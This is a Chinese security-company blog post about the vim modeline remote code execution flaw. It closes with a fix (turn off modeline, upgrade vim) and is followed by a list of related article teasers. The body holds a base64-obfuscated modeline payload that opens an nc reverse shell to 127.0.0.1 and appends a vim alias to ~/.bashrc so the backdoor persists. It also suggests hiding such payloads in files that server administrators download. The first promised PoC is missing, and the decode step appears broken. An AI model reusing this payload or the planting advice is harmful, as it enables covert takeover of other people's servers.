关键词:
网站漏洞修复之vim文本编辑BUG分析与修复方案
分类专栏: 网站安全 网站被黑 如何防止网站被黑 如何防止网站被侵入 如何防止网站被挂马 网站安全服务 网站安全防护服务 网站安全维护 网站安全问题 怎么查找网站漏洞 网站后门检测工具 网站被挂马怎么办 网站***检测 dedecms老被挂马
版权
linux系统一直以来都是比较安全的,不管是系统内核还是一些第三方软件都没有太大的漏洞,包括前几年爆出的redis漏洞,没有太多漏洞,然后最近linux频频爆出高危的漏洞,使用vim文本编辑器很多年了,得知被爆出远程代码执行漏洞,有点不可思议,全国大多数的linux服务器都使用的是vim,包括centos系统,redhat,关于该漏洞的详情以及修复方案,我们SINE安全来详细的跟大家介绍一下:
Linux vim漏洞详情
我们来看一下这个linux漏洞的利用条件,首先vim编辑器的版本是在8.0上下的,目前很多linux服务器都是8.0左右的版本,大部分的linux服务器受该漏洞的影响,再一个利用的条件是开启modeline选项,默认的vim配置是不自动开启的,所以漏洞的产生是要开启这个选项,很多低版本的VIM都不会开启,所以漏洞的影响范围降低了。我们来复现这个VIM POC漏洞,在VIM的配置文件里开启modeline,并保存。POC代码如下:
上面的漏洞是可以用来远程执行的,反向代理到我们自己的IP,进行后门连接,上面代码里的十六进制字符要转化成二进制的表现形式,然后将反斜杠的转义字符删除掉,可以将 写成回车键,这样就可以NC后门监听到我们自己的电脑IP,建立起远程反弹后门,对linux进行操作。
我们在实际漏洞测试当中还发现上面的POC代码并不能持久化的建立后门连接,运行一次后,第二次运行只能是普通文本的方式运行了,我们可以构造一下宏的***后门,每次运行vim命令都执行我们设定好的***后门NC反弹地址,代码如下:
[?7lSNothingqy:silent! w | call system(‘echo "IG5vaHVwIG5jIDEyNy4wLjAuMSA5OTk5IC1lIC9iaW4vc2ggPi9kZXYvbnVsbCAyPiYxICYgZWNobyAiYWxpYXMgdmltPSd2aW0gLWMgXCJAeVwiJ1xuIHNob3B0IC1zIGV4cGFuZF9hbGlhc2VzXG4iID4+IH4vLmJhc2hyYw=="| -d | sh‘) | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(‘set fde=x | source! \%‘) fdl=0: [1G[KNothing."[Dq
整个linux vim漏洞利用前提是要开启这个modeline配置,很多服务器默认是不开启这个选项的,不过有些服务器的系统版本包括centos 6.0版本的都会开启这个配置,有些服务器运维人员可能会下载配置文件,以及代码,可以直接在代码里加入后门,让他们VIM编辑的时候触发漏洞,总之只要打开了这个文件就会中招,关于该linux 漏洞的修复,建议将modeline关闭,并升级VIM到最新版本。
网站漏洞检测修复短息轰炸漏洞检测与修补方案
网站漏洞检测修复短息轰炸漏洞检测与修补方案分类专栏:网站安全网站被篡改网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务web网站安全服务怎么查找网站漏洞网站***检测网站被黑怎么修复wor... 查看详情
struts2架构网站漏洞修复详情与利用漏洞修复方案
...互联网企业,公司,平台都在使用apachestruts2系统来开发网站,以及应用系统,这几年来因为使用较多,被***者挖掘出来的struts2漏洞也越来越,从最一开始S2-001到现在的最新的s2-057漏洞,本文着重的给大家介绍一下struts2漏洞的利... 查看详情
网站***修复网站漏洞修复方案
网站***修复网站漏洞修复方案分类专栏:网站安全网站被黑centos运维如何防止网站被侵入如何防止网站被黑如何防止网站被挂马网站安全服务怎么查找网站漏洞web网站安全服务dedecms老被挂马该内容被禁止访问网站被黑怎么修复Me... 查看详情
怎么修复网站漏洞骑士cms的漏洞修复方案
怎么修复网站漏洞骑士cms的漏洞修复方案分类专栏:网站安全网站被黑网站被篡改如何防止网站被侵入如何防止网站被挂马如何防止网站被黑网站安全服务网站安全文章标签:如何修复网站漏洞网站漏洞怎么修复网站安全公司网... 查看详情
针对网站漏洞怎么修复区块链漏洞之以太坊
针对网站漏洞怎么修复区块链漏洞之以太坊分类专栏:网站安全网站安全文章标签:网站漏洞怎么修复网站安全公司网站漏洞修复网站安全网站漏洞检测版权前段时间以太坊升级架构,君士坦丁堡的硬分叉一个升级代号,被爆出... 查看详情
分享网站漏洞检测与如何修复网站逻辑漏洞
分享网站漏洞检测与如何修复网站逻辑漏洞分类专栏:网站安全网站被篡改网站被黑如何防止网站被黑如何防止网站被侵入如何防止网站被挂马网站安全服务网站安全防护服务网站安全维护网站安全问题ecshop漏洞修复MetInfo漏洞... 查看详情
网站安全之逻辑漏洞检测附网站漏洞修复方案
在网站安全的日常安全检测当中,我们SINE安全公司发现网站的逻辑漏洞占比也是很高的,前段时间某酒店网站被爆出存在高危的逻辑漏洞,该漏洞导致酒店的几亿客户的信息遭泄露,包括手机号,姓名,地址都被泄露,后续带... 查看详情
网站安全之逻辑漏洞检测附漏洞修复方案
在网站安全的日常安全检测当中,我们SINE安全公司发现网站的逻辑漏洞占比也是很高的,前段时间某酒店网站被爆出存在高危的逻辑漏洞,该漏洞导致酒店的几亿客户的信息遭泄露,包括手机号,姓名,地址都被泄露,后续带... 查看详情
怎么修复网站漏洞骑士cms的漏洞修复方案
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站漏洞可以获取网站的管理员账号... 查看详情
***测试对头像上传漏洞检测与修复
***测试对头像上传漏洞检测与修复分类专栏:网站安全漏洞检测网站***测试网站被黑文章标签:***测试网站安全测试网站漏洞检测网站安全防护网站漏洞扫描版权很多客户网站以及APP在上线运营之前都会对网站进行***测试,提前... 查看详情
测试网站搭建+渗透+审计之第二篇渗透测试
文章目录0x01信息泄漏漏洞(Swagger接口文档泄露)漏洞描述漏洞利用修复建议0x02未授权访问漏洞漏洞描述漏洞利用修复建议0x03登陆口暴力破解漏洞描述漏洞利用修复建议0x04弱口令漏洞漏洞描述漏洞利用修复建议0x05SQL注入漏洞漏... 查看详情
针对网站漏洞怎么修复区块链漏洞之以太坊
...,君士坦丁堡的硬分叉一个升级代号,被爆出含有高危的网站漏洞,该漏洞产生的原因是由于开启了新的协议模式eip1283导致的,也是区块链漏洞当中危害较为严重的,可以让一些交易进行重入,一个转账可以导致写入2次,但该... 查看详情
Vim:如何更改搜索命中和快速修复选择的突出显示颜色
】Vim:如何更改搜索命中和快速修复选择的突出显示颜色【英文标题】:Vim:Howtochangethehighlightcolorforsearchhitsandquickfixselection【发布时间】:2011-10-2912:16:30【问题描述】:我正在使用沙漠配色方案,它使用橙色背景上的白色文本来... 查看详情
cve-2019-14287漏洞与修复过程(代码片段)
CVE-2019-14287漏洞与修复过程CVE-2019-14287漏洞展示修复漏洞CVE-2019-14287漏洞CVE-2019-14287本地提权漏洞,漏洞因为是Sudo<1.8.28,只需要升级sudo>1.8.28的就可以修复完成展示使用root用户修改权限文件:vim/etc/sudoers,添加... 查看详情
spring漏洞及其修复方案
...workRCE,EarlyAnnouncement》的文章,官宣了最近网传的Spring漏洞。攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,漏洞利用细节已大范围公开,好在Spring官方已发布补丁修复该漏洞。漏洞分析Spring框架&#x... 查看详情
定心丸!zipperdown漏洞分析与修复建议
...云 发布。 近日,盘古实验室对外披露了ZipperDown漏洞,该漏洞是盘古团队针对不同客户的iOS应用安全审计的过程中发现的,大约有10%的iOS应用会受到此漏洞的影响。 利用此漏洞可以做很多事情,例如实现目录遍历攻... 查看详情
定心丸!zipperdown漏洞分析与修复建议
近日,盘古实验室对外披露了ZipperDown漏洞,该漏洞是盘古团队针对不同客户的iOS应用安全审计的过程中发现的,大约有10%的iOS应用会受到此漏洞的影响。利用此漏洞可以做很多事情,例如实现目录遍历攻击和AppContainer目录中任... 查看详情
网站漏洞安全***测试公司组建方案
网站漏洞安全***测试公司组建方案分类专栏:网站安全漏洞检测网站漏洞修复网站***测试文章标签:***测试公司网站安全公司网站漏洞修复公司网站程序漏洞查找网站安全维护公司版权越来越多的网站和app的上线,导致安全问题... 查看详情